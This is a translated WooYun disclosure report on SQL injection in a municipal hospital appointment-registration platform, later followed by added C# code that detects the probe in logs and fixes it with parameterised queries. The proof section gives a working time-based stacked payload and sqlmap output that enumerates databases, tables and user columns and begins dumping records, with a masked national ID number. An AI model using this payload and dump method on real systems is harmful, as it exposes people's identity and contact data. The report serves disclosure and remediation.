
Vulnerability summary

Defect ID: wooyun-2015-0159892

Title: Multiple SQL injections in a municipal unified appointment-registration service platform (DBA privileges / 10 databases / 125,000 user records including national ID numbers and mobile numbers)

Affected vendor: a municipal unified appointment-registration service platform (某市预约挂号统一服务平台)

Author: 路人甲

Submitted: 2015-12-10 17:53

Fix time: 2016-01-28 17:10

Public disclosure: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-12-10: Details sent to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details visible to the vendor only
2015-12-24: Details opened to core white hats and domain experts
2016-01-03: Details opened to regular white hats
2016-01-13: Details opened to intern white hats
2016-01-28: Details opened to the public

Brief description:

Detailed description:

**.**.**.**


Name, national ID number and mobile number are required fields at registration.

[image: 1.png]


Injection points:

http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012


http://**.**.**.**/zxDoctorInformation.aspx?ID=6


http://**.**.**.**/zkClassCaseInfo.aspx?ID=1&Hospital=ZK00000001


http://**.**.**.**/zxQuestion.aspx?DoctorID=1


http://**.**.**.**/202/DoctInfo.aspx?ID=346


http://**.**.**.**/Order202.aspx?Dept_Name=


Proof of vulnerability:

Taking http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012 as the example (output is in sqlmap's format; the injection is stacked-query, time-based blind):

Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'--
---
[09:17:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[09:17:15] [INFO] testing if current user is DBA
current user is DBA: True


Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'--
---
[09:09:40] [INFO] testing Microsoft SQL Server
[09:09:41] [INFO] confirming Microsoft SQL Server
[09:09:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
[09:09:43] [INFO] fetching database names
[09:09:43] [INFO] fetching number of databases
[09:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:09:43] [INFO] retrieved: 10
[09:09:47] [INFO] retrieved: Car
[09:09:59] [INFO] retrieved: demo
[09:10:20] [INFO] retrieved: master
[09:10:48] [INFO] retrieved: model
[09:11:17] [INFO] retrieved: msdb
[09:11:40] [INFO] retrieved: PLATFORM
[09:12:16] [INFO] retrieved: REPAIR
[09:12:40] [INFO] retrieved: tempdb
[09:13:14] [INFO] retrieved: XLIST
[09:13:41] [INFO] retrieved: YYGH
available databases [10]:
[*] Car
[*] demo
[*] master
[*] model
[*] msdb
[*] PLATFORM
[*] REPAIR
[*] tempdb
[*] XLIST
[*] YYGH


reg_user is the user registration table, with 125,311 rows (the row count in the dump run further below reads 125,484).

Database: YYGH
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.IpAddress                  | 444969  |
| dbo.money_all                  | 179048  |
| dbo.reg_user                   | 125311  |
| dbo.Log                        | 62794   |
| dbo.R_PREREGISTER              | 41798   |
| dbo.user_reg                   | 28246   |
| dbo.money_add                  | 25609   |
| dbo.HintDetail                 | 13686   |
| dbo.HintDetail                 | 13686   |
| dbo.QuestionMoney              | 4276    |
| dbo.QuestionMoney              | 4276    |
| dbo.money_t                    | 2562    |
| dbo.YaoFang                    | 2516    |
| dbo.DoctTotal                  | 1018    |
| dbo.DoctInfo                   | 800     |
| dbo.JoinInHospital             | 672     |
| dbo.Memo                       | 480     |
| dbo.JoinInAD                   | 452     |
| dbo.SX_Save                    | 331     |
| dbo.HospitalPaiming            | 270     |
| dbo.ZK_Register                | 237     |
| dbo.LNZY_Log                   | 193     |
| dbo.LNZY_String                | 193     |
| dbo.ZK_ClassCase               | 135     |
| dbo.ZK_MediaReport             | 134     |
| dbo.ZK_AuthorityTechnology     | 131     |
| dbo.Code_Area                  | 129     |
| dbo.ZK_MedicalEquipment        | 122     |
| dbo.temp                       | 119     |
| dbo.LNZY_ScheduleInformation   | 118     |
| dbo.ZK_DoctorInformation       | 78      |
| dbo.MediaReport                | 73      |
| dbo.DiseaseBase                | 72      |
| dbo.DiseaseBase                | 72      |
| dbo.Advice                     | 43      |
| dbo.ZK_ImgNews                 | 40      |
| dbo.lock_user                  | 36      |
| dbo.Code_HosType               | 33      |
| dbo.DeptInfo                   | 32      |
| dbo.Code_Professional          | 24      |
| dbo.ZK_HospitalInformation     | 21      |
| dbo.HealthPressure             | 20      |
| dbo.ZK_DepartmentInformation   | 20      |
| dbo.DoctAdvice                 | 19      |
| dbo.HospitalHot                | 19      |
| dbo.ZK_Admin                   | 19      |
| dbo.ZK_TopicRead               | 17      |
| dbo.SMS                        | 15      |
| dbo.Code_ProfessionalType      | 14      |
| dbo.LNZY_DoctorInformation     | 14      |
| dbo.HealthGuide                | 13      |
| dbo.SX_Return                  | 12      |
| dbo.SX_Return                  | 12      |
| dbo.HospitalRank               | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.HealthHeart                | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.Code_HosLevel              | 9       |
| dbo.NewsQuestion               | 9       |
| dbo.JIBIE                      | 8       |
| dbo.ZK_Flash                   | 8       |
| dbo.Code_Education             | 7       |
| dbo.Code_Blood                 | 6       |
| dbo.Code_Job                   | 6       |
| dbo.Code_Admin                 | 5       |
| dbo.LNZY_DepartmentInformation | 5       |
| dbo.AdminUser                  | 4       |
| dbo.Code_Degree                | 4       |
| dbo.Code_Paper                 | 4       |
| dbo.Code_Practice              | 4       |
| dbo.Code_RH                    | 4       |
| dbo.Code_Sex                   | 4       |
| dbo.Code_Arrange               | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_Level                 | 3       |
| dbo.system32                   | 3       |
| dbo.Health_Lecture             | 2       |
| dbo.Health_Memo                | 2       |
| dbo.Health_Record              | 2       |
| dbo.LNZY_PreRegister           | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.Health_Warning             | 1       |
| dbo.HealthLecture              | 1       |
| dbo.HealthWarning              | 1       |
| dbo.SerialNum                  | 1       |
+--------------------------------+---------+


http://**.**.**.**/zkClassCaseInfo.aspx?Hospital=ZK00000001&ID=1

Dumping some data (same tool, now through the Hospital parameter):

Payload: Hospital=ZK00000001';WAITFOR DELAY '0:0:5'--&ID=1
---
[10:54:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[10:54:04] [INFO] fetching columns for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] resumed: 25
[10:54:04] [INFO] resumed: answer
[10:54:04] [INFO] resumed: birthday
[10:54:04] [INFO] resumed: email
[10:54:04] [INFO] resumed: id
[10:54:04] [INFO] resumed: job
[10:54:04] [INFO] resumed: money
[10:54:04] [INFO] resumed: name
[10:54:04] [INFO] resumed: now
[10:54:04] [INFO] resumed: oldmoney
[10:54:04] [INFO] resumed: password
[10:54:04] [INFO] resumed: phone
[10:54:04] [INFO] resumed: postcode
[10:54:04] [INFO] resumed: question
[10:54:04] [INFO] resumed: sex
[10:54:04] [INFO] resumed: sf
[10:54:04] [INFO] resumed: sh
[10:54:04] [INFO] resumed: SMS
[10:54:04] [INFO] resumed: tel
[10:54:04] [INFO] resumed: tel1
[10:54:04] [INFO] resumed: username
[10:54:04] [INFO] resumed: vip
[10:54:04] [INFO] resumed: vipfy
[10:54:04] [INFO] resumed: viptime
[10:54:04] [INFO] resumed: WeiXin
[10:54:04] [INFO] resumed: ybk
[10:54:04] [INFO] fetching entries for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] fetching number of entries for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] resumed: 125484
[10:54:04] [INFO] fetching number of distinct values for column 'id'
[10:54:04] [INFO] resumed: 125482
[10:54:04] [INFO] fetching number of distinct values for column 'sf'
[10:54:04] [INFO] resumed: 122102
[10:54:04] [INFO] fetching number of distinct values for column 'sh'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'SMS'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'job'
[10:54:04] [INFO] resumed: 49213
[10:54:04] [INFO] fetching number of distinct values for column 'now'
[10:54:04] [INFO] resumed: 2364
[10:54:04] [INFO] fetching number of distinct values for column 'sex'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'tel'
[10:54:04] [INFO] resumed: 82234
[10:54:04] [INFO] fetching number of distinct values for column 'vip'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'ybk'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'name'
[10:54:04] [INFO] resumed: 86120
[10:54:04] [INFO] fetching number of distinct values for column 'tel1'
[10:54:04] [INFO] resumed: 113967
[10:54:04] [INFO] fetching number of distinct values for column 'email'
[10:54:04] [INFO] resumed: 26924
[10:54:04] [INFO] fetching number of distinct values for column 'money'
[10:54:05] [INFO] resumed: 174
[10:54:05] [INFO] fetching number of distinct values for column 'phone'
[10:54:05] [INFO] resumed: 1
[10:54:05] [INFO] fetching number of distinct values for column 'vipfy'
[10:54:05] [INFO] resumed: 3
[10:54:05] [INFO] fetching number of distinct values for column 'WeiXin'
[10:54:05] [INFO] resumed: 2
[10:54:05] [INFO] fetching number of distinct values for column 'answer'
[10:54:05] [INFO] resumed: 43459
[10:54:05] [INFO] fetching number of distinct values for column 'viptime'
[10:54:05] [INFO] resumed: 806
[10:54:05] [INFO] fetching number of distinct values for column 'birthday'
[10:54:05] [INFO] resumed: 24755
[10:54:05] [INFO] fetching number of distinct values for column 'oldmoney'
[10:54:05] [INFO] resumed: 159
[10:54:05] [INFO] fetching number of distinct values for column 'password'
[10:54:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:54:05] [INFO] retrieved: 87403
[10:54:30] [INFO] fetching number of distinct values for column 'postcode'
[10:54:30] [INFO] retrieved: 3088
[10:55:02] [INFO] fetching number of distinct values for column 'question'
[10:55:02] [INFO] retrieved: 19866
[10:55:35] [INFO] fetching number of distinct values for column 'username'
[10:55:35] [INFO] retrieved: 125466
[10:56:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
[10:56:01] [INFO] retrieved: 10000
[10:57:00] [INFO] retrieved: 211223************ (an 18-digit national ID number, masked)
[10:59:27] [INFO] retrieved: 1
[10:59:43] [INFO] retrieved: 0
[10:59:55] [INFO] retrieved:


Far too slow, so I stopped here.
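The probes above leave an unmistakable trail in the web server logs: the literal WAITFOR DELAY, a closing quote followed by a statement separator, a trailing comment, and a response time that matches the injected delay. The following C# program is an added example, not part of the original report or of the platform's code. It runs a detector over a few constructed IIS W3C log lines (the field layout, timestamps and client addresses are assumptions; the paths and the payload are the ones reported above) and groups hits per client so that one source probing several endpoints stands out.

```csharp
// Added example, not code from the original report or from the platform: a detector
// for the WAITFOR DELAY probes shown above, run over constructed IIS W3C log lines.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;

public static class TimeBasedSqliDetector
{
    // Constructed sample (not a real log). Assumed field layout:
    // date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken(ms)
    // The paths and the payload are the ones in the report; IPs are documentation ranges.
    public const string SampleLog =
        "2015-12-10 09:17:10 GET /zkHospital1.aspx ID=ZK00000012 198.51.100.7 200 31\n" +
        "2015-12-10 09:17:15 GET /zkHospital1.aspx ID=ZK00000012'%3BWAITFOR%20DELAY%20'0%3A0%3A5'-- 198.51.100.7 200 5047\n" +
        "2015-12-10 09:17:21 GET /zkHospital1.aspx ID=ZK00000012'%3BWAITFOR%20DELAY%20'0%3A0%3A5'-- 198.51.100.7 200 5039\n" +
        "2015-12-10 09:18:02 GET /zxQuestion.aspx DoctorID=1 203.0.113.9 200 28\n" +
        "2015-12-10 10:54:04 GET /zkClassCaseInfo.aspx Hospital=ZK00000001'%3BWAITFOR+DELAY+'0%3A0%3A5'--&ID=1 198.51.100.7 200 5052\n";

    // Signatures of the reported payload: the delay call, a closing quote followed by a
    // statement separator (stacked query), and a trailing comment that eats the rest.
    static readonly Regex TimeBased = new Regex(@"\bWAITFOR\s+DELAY\b", RegexOptions.IgnoreCase);
    static readonly Regex Stacked = new Regex(@"'\s*;");
    static readonly Regex Comment = new Regex(@"--|/\*");

    public class Hit
    {
        public string Time;
        public string ClientIp;
        public string Path;
        public string DecodedQuery;
        public int TimeTakenMs;
        public List<string> Reasons = new List<string>();
    }

    // Decode the way the server does: '+' is a space inside a query string, then
    // percent-decoding. Replacing '+' first keeps an encoded %2B intact.
    public static string DecodeQuery(string rawQuery)
    {
        return Uri.UnescapeDataString(rawQuery.Replace('+', ' '));
    }

    public static List<Hit> Scan(string log, int slowThresholdMs)
    {
        var hits = new List<Hit>();
        foreach (var line in log.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries))
        {
            if (line.StartsWith("#")) continue; // W3C directive lines
            var f = line.Split(' ');
            if (f.Length < 8) continue;
            var hit = new Hit
            {
                Time = f[0] + " " + f[1],
                Path = f[3],
                DecodedQuery = DecodeQuery(f[4]),
                ClientIp = f[5],
                TimeTakenMs = int.Parse(f[7])
            };
            if (TimeBased.IsMatch(hit.DecodedQuery)) hit.Reasons.Add("WAITFOR DELAY in query string");
            if (Stacked.IsMatch(hit.DecodedQuery)) hit.Reasons.Add("quote-terminated stacked statement");
            if (Comment.IsMatch(hit.DecodedQuery)) hit.Reasons.Add("SQL comment in query string");
            // Strongest signal: a flagged request that also took about as long as the
            // injected delay, which means the WAITFOR actually executed on the server.
            if (hit.Reasons.Count > 0 && hit.TimeTakenMs >= slowThresholdMs)
                hit.Reasons.Add("response time matches the injected delay");
            if (hit.Reasons.Count > 0) hits.Add(hit);
        }
        return hits;
    }

    // One source sending the same payload to several endpoints is the scanning
    // pattern in the report; a single odd request from a user looks different.
    public static Dictionary<string, int> EndpointsPerClient(IEnumerable<Hit> hits)
    {
        return hits.GroupBy(h => h.ClientIp)
                   .ToDictionary(g => g.Key, g => g.Select(h => h.Path).Distinct().Count());
    }

    public static void Main()
    {
        var hits = Scan(SampleLog, 4000);
        foreach (var h in hits)
            Console.WriteLine(h.Time + " " + h.ClientIp + " " + h.Path + " " + h.TimeTakenMs + "ms: " + string.Join("; ", h.Reasons));
        foreach (var kv in EndpointsPerClient(hits))
            Console.WriteLine(kv.Key + " probed " + kv.Value + " distinct endpoint(s)");
    }
}
```

Compile it as a console application. Scan returns one Hit per suspicious request and EndpointsPerClient counts the distinct endpoints each client touched. The time-taken check only fires once the injected delay really executed, so it confirms success rather than attempts; the pattern matches fire on every probe, including the ones that fail. Threshold and field positions must be adjusted to the server's actual W3C field list.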

Fix recommendation:

You are more professional than I am.

Copyright: please credit 路人甲@乌云 when reposting.
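The report leaves the fix to the vendor. What follows is an added example in C#, not the platform's own code: it shows the string-concatenation pattern that the `';WAITFOR DELAY '0:0:5'--` payload exploits beside a parameterised ADO.NET query for the zkHospital1.aspx?ID= endpoint, an input check for the ID format, and a start-up check that the application's SQL login is not sysadmin (the report found "current user is DBA: True"). The table name, the column width and the ZK-plus-eight-digits ID format are assumptions drawn from the names and values visible in the report.

```csharp
// Added example (not the platform's own code): the vulnerable pattern the sqlmap
// output implies, next to a parameterised replacement, plus a start-up check that
// the application login is not a sysadmin. Table and column names are assumptions.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class HospitalRepository
{
    // VULNERABLE (what ID=ZK00000012';WAITFOR DELAY '0:0:5'-- exploits): the raw
    // query-string value is concatenated into the statement, so the closing quote,
    // the stacked WAITFOR DELAY and the -- comment all reach SQL Server as code.
    // Shown only to make the failure concrete; never execute the string it builds.
    public static string BuildUnsafeSql(string id)
    {
        return "SELECT * FROM dbo.ZK_HospitalInformation WHERE ID = '" + id + "'";
    }

    // FIXED: the value travels as a typed parameter, never as part of the SQL text.
    // Whatever the caller sends is compared as a literal string against ID, so the
    // quote, the semicolon and the comment marker have no syntactic effect.
    public static DataTable GetHospital(string connectionString, string id)
    {
        const string sql = "SELECT * FROM dbo.ZK_HospitalInformation WHERE ID = @ID";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@ID", SqlDbType.VarChar, 10).Value = id;
            var table = new DataTable();
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }

    // Defence in depth: every hospital ID in the report is "ZK" followed by eight
    // digits (assumed format), so anything else is rejected before a query is built.
    public static bool IsWellFormedHospitalId(string id)
    {
        return id != null && Regex.IsMatch(id, @"^ZK\d{8}$");
    }

    // Least privilege: "current user is DBA: True" means the web login is sysadmin.
    // Call once at start-up (Application_Start) and refuse to run if the login can
    // do anything beyond reading and writing the application's own tables.
    public static void AssertNotSysadmin(string connectionString)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("SELECT IS_SRVROLEMEMBER('sysadmin')", conn))
        {
            conn.Open();
            object result = cmd.ExecuteScalar(); // 1 = member, 0 = not, NULL = unknown role
            if (result != null && result != DBNull.Value && Convert.ToInt32(result) == 1)
            {
                throw new InvalidOperationException(
                    "The application login is a member of sysadmin; use a login limited to " +
                    "db_datareader/db_datawriter on YYGH instead.");
            }
        }
    }
}
```

In the Web Forms code-behind, replace the string-building call with GetHospital(connectionString, Request.QueryString["ID"]) after IsWellFormedHospitalId has rejected anything that is not a ZK id, and repeat the same change at each of the other five injection points, using SqlDbType.Int for numeric parameters such as DoctorID. AssertNotSysadmin belongs in Application_Start: a login restricted to the YYGH database would have kept an injection from enumerating all ten databases and from reaching the server-level features a sysadmin login exposes, although it would not by itself have prevented reading reg_user, which only parameterisation does.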


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-12-14 17:18

Vendor reply:

CNVD has confirmed and reproduced the reported vulnerability and forwarded it through CNCERT to the Liaoning branch center, which will coordinate remediation with the organization that operates the site.

Latest status:

None yet